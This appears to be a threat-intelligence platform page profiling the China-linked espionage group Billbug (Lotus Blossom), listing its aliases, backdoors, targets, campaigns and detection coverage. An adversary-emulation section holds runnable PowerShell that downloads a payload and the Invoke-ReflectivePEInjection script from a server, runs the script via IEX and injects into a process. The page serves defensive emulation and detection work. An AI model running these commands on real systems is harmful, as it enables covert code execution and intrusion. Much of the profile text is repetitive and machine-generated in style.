Home/Threat Actor/Billbug
Threat Actor

Billbug

billbug · china · active since 2009-01

Billbug (canonical Symantec naming, also tracked as Lotus Blossom per Palo Alto Networks 2015 + Thrip per Symantec 2018-2019 + Spring Dragon per Kaspersky + Bronze Elgin per Secureworks + Lotus Panda per CrowdStrike + Trensil/Elise backdoor family naming) is a longstanding China-based cyberespionage APT active since at least 2009 with 12+ year operational history.

China state- sponsored attribution via Symantec canonical tracking with Thrip-Billbug unification 2019 ("we subsequently determined that Thrip and Billbug were most likely the same group and began tracking all activity under the Billbug name") + Palo Alto Networks 2015 first public attribution + multi-vendor naming consensus + Symantec Security.com November 2022 + April 2025 Relentless Force whitepaper + Bleeping Computer + Dark Reading + SecurityWeek + The Record + SC Media + SecurityAffairs canonical coverage; standalone cluster paralleling velvet_ant + storm_2603 + earth_alux in v0.1.154 China-aligned 2022-2025 enterprise persistence + exploitation operators cell.

operational target profile Southeast Asia primary geographic per 12+ year Symantec tracking with Hong Kong + Macau + Indonesia + Malaysia + Philippines + Vietnam + Thailand Southeast Asian victims per Symantec 2019 + signature distinctive certificate authority targeting per Symantec November 2022 (additional motivation for malware code signing capability + HTTPS traffic interception) + government ministry + defense agencies + military + telecom + air traffic control + air freight + construction + news agency + maritime + media + education + geospatial imaging + IT + aerospace/ satellite (per Dark Reading aerospace operator satellite movement control targeting) sectors + U.S. secondary geographic per Symantec 2018; operational attack architecture: (1) cluster- defining Hannotog (Backdoor.Hannotog) custom backdoor with firewall config modification + persistence + encrypted upload + CMD command execution + file download capability per Symantec; (2) cluster-defining Sagerunex (Backdoor. Sagerunex) custom backdoor dropped by Hannotog + injects explorer.exe process + AES-256 encrypted local temp file logs + RC4 encrypted config and state with hardcoded keys per Symantec.

(3) signature Trensil (aka Elise) Trojan + Infostealer .Catchamas historical backdoors per Palo Alto Networks 2015 + Symantec 2018.

(4) cluster- defining ChromeKatz (Chrome credentials + cookies stealer) + CredentialKatz (Chrome credentials stealer) + Reverse SSH Tool (custom listening port 22) 2024-2025 custom tooling per Symantec April 2025 Relentless Force whitepaper Southeast Asia campaign (August 2024 - February 2025) at government ministry + air traffic control + telecom operator + construction company.

(5) signature Zrok publicly- available peer-to-peer tool adoption for internal services remote access.

(6) signature Stowaway Go-based multi-level proxy tunneller open-source adoption for network discovery + lateral movement; (7) cluster-defining LOLBins tradecraft per Dark Reading + Symantec November 2022 (AdFind for Active Directory enumeration + Certutil for certificate manipulation + NBTscan for NetBIOS enumeration + Ping + Port Scanner + Route + Tracert + Winmail + WinRAR for file archiving for exfiltration staging + PsExec for SMB lateral movement)

(8) cluster-defining certificate authority targeting signature distinctive tradecraft objective per Symantec November 2022 with potential malware code signing capability + HTTPS interception (no evidence of successful CA digital certificate compromise per Symantec)

(9) signature spearphishing emails + convincing lure documents historical pattern per Palo Alto 2015; (10) signature new Sagerunex variant SHA256: 4b430e9e43611aa67263f03fd42207c8ad06267d9b971db876 b6e62c19a0805e Cisco February 2025 documentation with registry-modified-as-service persistence mechanism evolution.

cluster fills the 2009-onward- longstanding-operation + Lotus-Blossom-Thrip-Spring- Dragon-Bronze-Elgin-Lotus-Panda-multi-vendor-naming + Hannotog-Sagerunex-custom-backdoors + ChromeKatz- CredentialKatz-reverse-SSH-2024-2025-evolution + certificate-authority-targeting + Southeast-Asia- government-defense-telecom-targeting + LOLBins- tradecraft + spearphishing-lure-documents position in China-aligned 2022-2025 enterprise persistence + exploitation operators cell.

canonical illustration of 17-year-active China APT longstanding operational signature + multi-vendor naming history attribution-unification challenge + certificate authority targeting tradecraft + custom Hannotog/Sagerunex backdoor pair + LOLBins tradecraft + ChromeKatz/CredentialKatz 2024-2025 evolution cited in essentially all subsequent Southeast Asian APT industry analyses through 2009-2026 period.

china confidence: high 22 aliases MITRE ATT&CK G0076 ↗
Sigma rules201 YARA rules23 Live IOCs0 CVEs exploited0

Profile

Billbug (canonical Symantec naming, also tracked as Lotus Blossom + Thrip + Spring Dragon + Bronze Elgin + Lotus Panda + Elise + Trensil by various vendors) is a longstanding China-based cyberespionage APT active since at least 2009 with 12+ year operational history. China state-sponsored attribution via Symantec canonical tracking unified 2019 + Palo Alto Networks 2015 first public attribution + Kaspersky Spring Dragon tracking + Secureworks Bronze Elgin tracking + CrowdStrike Lotus Panda tracking. Operationally significant 2019 Thrip + Billbug attribution unification per Symantec.

Standalone cluster paralleling velvet_ant + storm_2603 + earth_alux in v0.1.154 China-aligned 2022-2025 enterprise persistence + exploitation operators cell.

Operational target profile
  • Southeast Asia primary geographic per 12+ year Symantec tracking.
  • Hong Kong + Macau + Indonesia + Malaysia + Philippines + Vietnam Southeast Asian targets.
  • Certificate authority signature distinctive target per Symantec 2022.
  • Government + defense + military + telecom + air traffic control + air freight + construction + news agency + maritime + education + IT sectors.
  • United States secondary geographic Operational attack architecture: (1) Hannotog (Backdoor.Hannotog) custom backdoor (cluster-defining): firewall config modification + persistence + encrypted upload + CMD execution + file download per Symantec (2) Sagerunex (Backdoor.Sagerunex) custom backdoor (cluster-defining): dropped by Hannotog + injects explorer.exe + AES-256 encrypted local log + RC4 config + state per Symantec (3) Trensil/Elise + Infostealer.Catchamas historical backdoors (signature): per Palo Alto 2015 + Symantec 2018 (4) ChromeKatz + CredentialKatz + Reverse SSH Tool 2024-2025 custom tooling (cluster-defining): Chrome credentials + cookies stealers per Symantec April 2025 (5) Zrok publicly-available peer-to-peer tool adoption (signature): 2024-2025 internal services remote access (6) Stowaway Go-based multi-level proxy (signature): tunneller adoption (7) LOLBins tradecraft (cluster-defining): AdFind + Certutil + NBTscan + Ping + Port Scanner + Route + Tracert + Winmail + WinRAR + PsExec (8) Certificate authority targeting (cluster- defining): signature distinctive objective for malware code signing capability per Symantec 2022 (9) Spearphishing emails + lure documents (signature): per Palo Alto Networks 2015 historical pattern The cluster fills the 2009-onward-longstanding- operation + Lotus-Blossom-Thrip-Spring-Dragon- multi-vendor-naming + Hannotog-Sagerunex-custom- backdoors + ChromeKatz-CredentialKatz-2024-2025- evolution + certificate-authority-targeting + Southeast-Asia-government-defense-telecom-targeting + LOLBins-tradecraft position in China-aligned 2022-2025 enterprise persistence + exploitation operators cell.

Aliases

22
billbugbill bugbill_buglotus_blossomlotus blossomthripspring_dragonspring dragonbronze_elginbronze elginlotus_pandalotus pandaelisetrensilbillbug active since 2009 longstanding china aptbillbug certificate authority targeting asia 2022billbug government defense agencies asian countriesbillbug hannotog sagerunex custom backdoors signaturebillbug infostealer.catchamas symantec 2018 disclosurebillbug stowaway go-based multi-level proxybillbug 2024 2025 southeast asia persistent intrusion campaignbillbug chromekatz credentialkatz reverse ssh tool 2024 2025

Adversary Emulation Plan

2 steps
Runnable Caldera emulation profile Stowaway - Inject sandcat into a process (NOTE - Requires MinGW to be installed on Caldera Server). Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 discovery T1057 · Process Discovery windows
Discover injectable process
$owners = @{};
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};
$ps = get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}};
$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq "svchost") {$p} };
$valid | ConvertTo-Json
Inject Sandcat into process
$url="#{server}/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","shared.go");
$wc.Headers.add("server","#{server}");
$PEBytes = $wc.DownloadData($url);
$wc1 = New-Object System.net.webclient;
$wc1.headers.add("file","Invoke-ReflectivePEInjection.ps1");
IEX ($wc1.DownloadString($url));
Invoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}

Notable Campaigns

10
2025Billbug New Sagerunex Variant, Cisco February 2025 Documentation
2024-2025Symantec April 2025 Relentless Force Whitepaper, Southeast Asia Multi-Org Intrusion Campaign (August 2024 - February 2025)
2024-2025Billbug ChromeKatz + CredentialKatz + Reverse SSH Tool Custom Tooling Signature (2024-2025)
2022-2024Billbug LOLBins Tradecraft Signature
2022Symantec November 2022 Canonical Certificate Authority Targeting Disclosure
2019Symantec Thrip-Billbug Unification + Hannotog/Sagerunex Backdoors Disclosure (2019)
2018Symantec Thrip Telecom Attack + Infostealer.Catchamas Disclosure (2018)
2015Palo Alto Networks Lotus Blossom First Public Attribution (2015)
2009-2026Continued Industry Reference Status (2009-2026)
2009Billbug Origin, Active Since 2009

Attribution & Reporting

Attributed by
Symantec / Broadcom (canonical Billbug + Thrip + Lotus Blossom unification + 2018 + 2019 + November 2022 + April 2025 Relentless Force whitepaper disclosures)Palo Alto Networks (canonical 2015 Lotus Blossom first public attribution + Elise/Trensil Trojan disclosure)Kaspersky (canonical Spring Dragon tracking)Secureworks (canonical Bronze Elgin tracking)CrowdStrike (canonical Lotus Panda tracking)Bleeping Computer (canonical Chinese hackers target government agencies and defense orgs coverage)Dark Reading (canonical China-Based Billbug APT Infiltrates Certificate Authority coverage)SecurityWeek (canonical Chinese Cyberespionage Group Billbug Targets Certificate Authority coverage)SC Media (canonical Asian certificate authority government agencies targeted by Chinese APT coverage)The Record / Recorded Future News (canonical Chinese state-sponsored group hacked certificate authority coverage)SecurityAffairs (canonical Billbug APT certificate authority Asia coverage)Cisco (canonical February 2025 Sagerunex variant documentation referenced by Symantec)Brigid O Gorman / Symantec Threat Hunter Team Senior Intelligence Analyst (canonical analyst commentary)
Key reporting
reportSymantec / Broadcom: canonical November 2022 + April 2025 Relentless Force whitepaper + 2018 + 2019 + 2015 (Palo Alto) Billbug + Thrip + Lotus Blossom disclosures
reportSymantec: Billbug, State-sponsored Actor Targets Cert Authority Government Agencies in Multiple Asian Countries (November 2022), canonical certificate authority disclosure
reportSymantec: Billbug, Intrusion Campaign Against Southeast Asia Continues (April 2025 Relentless Force whitepaper), canonical 2024-2025 Southeast Asia campaign
reportPalo Alto Networks (2015): canonical Lotus Blossom first public attribution + Trensil/Elise Trojan disclosure
reportBleeping Computer: Chinese hackers target government agencies and defense orgs (November 2022)
reportDark Reading: China-Based Billbug APT Infiltrates Certificate Authority (November 2022)
reportSecurityWeek: Chinese Cyberespionage Group Billbug Targets Certificate Authority (November 2022)
reportThe Record / Recorded Future News: Alleged Chinese state-sponsored group hacked certificate authority (November 2022)
reportSC Media: Asian certificate authority government agencies targeted by Chinese APT
reportSecurityAffairs: China-linked APT Billbug breached a certificate authority in Asia (November 2022)
reportCisco: canonical February 2025 Sagerunex variant documentation (referenced by Symantec April 2025)
reportBrigid O Gorman / Symantec Threat Hunter Team: canonical Senior Intelligence Analyst commentary

Operational

State sponsor

China state-sponsored, Symantec canonical tracking with longstanding cyberespionage motivation against Southeast Asian governments + military + communications + maritime + education + telecom sectors. Suspected operational continuity with broader Chinese APT ecosystem since 2009 first observation. Attribution chain: (1) Palo Alto Networks 2015 first public attribution (Lotus Blossom): per Symantec Security.com: "The group first came to public attention in 2015 when Palo Alto published a report on its activities in Southeast Asia, linking it to over 50 different attacks over a period of three years.

Its campaigns used spear-phishing emails and convincing lure documents to deliver the custom Trensil (aka Elise) Trojan." (2) Symantec 2018 Thrip disclosure: per Symantec Security.com: "In 2018, Symantec published an investigation on the group's activity, detailing an attack on a large telecoms operator in Southeast Asia. The attackers used PsExec to install a previously unknown piece of malware (Infostealer.Catchamas). The discovery of this attack led to the discovery of further attacks against the communications, geospatial imaging, and defense sectors, both in the U.S. and Southeast Asia." (3) Symantec 2019 Thrip/Billbug unification + Hannotog/Sagerunex backdoors disclosure: per Symantec Security.com: "In 2019, Symantec published another report on the group, detailing the use of two previously unseen backdoors known as Hannotog (Backdoor.Hannotog) and another backdoor known as Sagerunex (Backdoor.Sagerunex)... we subsequently determined that Thrip and Billbug were most likely the same group and began tracking all activity under the Billbug name." Operationally significant attribution unification.

(4) Symantec November 2022 canonical certificate authority targeting disclosure: per Symantec Security.com + Bleeping Computer + Dark Reading + SecurityWeek + The Record: "Symantec, by Broadcom Software, was able to link this activity to a group we track as Billbug due to the use in this campaign of tools previously attributed to this group... The victims in this campaign included a certificate authority, as well as government and defense agencies. All the victims were based in various countries in Asia." Per Symantec: "The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines.

It could also potentially use compromised certificates to intercept HTTPS traffic." (5) Symantec April 2025 Relentless Force whitepaper canonical 2024-2025 Southeast Asia multi-org intrusion campaign: per Symantec Security.com: "The Billbug espionage group (aka Lotus Blossom, Lotus Panda, Bronze Elgin) compromised multiple organizations in a single Southeast Asian country during an intrusion campaign that ran between August 2024 and February 2025. Targets included a government ministry, an air traffic control organization, a telecoms operator, and a construction company. In addition to this, the group staged an intrusion against a news agency located in another country in Southeast Asia and an air freight organization located in another neighboring country." Custom tools deployed: ChromeKatz (Chrome credentials + cookies stealer) + CredentialKatz + Reverse SSH Tool + Zrok peer-to-peer tool + new Sagerunex variant per Cisco February 2025.

Operational mission objective: Long-term cyberespionage + data theft against Southeast Asian governments + military + telecom + maritime + education + air traffic control + construction + news agency + air freight + IT + U.S. sectors. Certificate authority targeting for potential malware signing capability per Symantec 2022. Government espionage objective per Brigid O Gorman Symantec Threat Hunter Team.

Operational target profile
  • Southeast Asia primary geographic focus per Symantec 12+ year tracking.
  • Hong Kong + Macau + Indonesia + Malaysia + Philippines + Vietnam Southeast Asian victims per Symantec 2019.
  • Certificate authority signature target per Symantec 2022.
  • Government + defense + military primary sectors.
  • Telecom + maritime + media + education + construction + air traffic control + air freight secondary sectors.
  • United States secondary geographic per Symantec 2018 The cluster fills the 2009-onward-longstanding- operation + Lotus-Blossom-Thrip-Spring-Dragon- naming-history + Hannotog-Sagerunex-custom- backdoors + Trensil-Elise-Infostealer.Catchamas- ChromeKatz-CredentialKatz-reverse-SSH + certificate- authority-targeting + Southeast-Asia-government- defense-telecom-targeting position in China-aligned 2022-2025 enterprise persistence + exploitation operators cell.
Motivations
china_state_sponsored_longstanding_cyberespionage_2009_onward, southeast_asian_government_defense_military_telecom_targeting, certificate_authority_targeting_for_malware_signing_signature_capability, hannotog_sagerunex_custom_backdoors_signature_capability, chromekatz_credentialkatz_reverse_ssh_2024_2025_custom_tooling_capability, lolbins_tradecraft_signature
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)58/60 · 96%
Analytics (MITRE CAR)34/60 · 56%
Runtime / container (Falco)7/60 · 11%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)19/60 · 31%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

1 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SAGERUNEX VARIANT 4B430E9E43611AA67263F03FD42207C8AD06267D9B971DB876B6E62C19A0805E CISCO FEBRUARY 2025SPEARPHISHING EMAILS + CONVINCING LURE DOCUMENTSSTOWAWAY
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin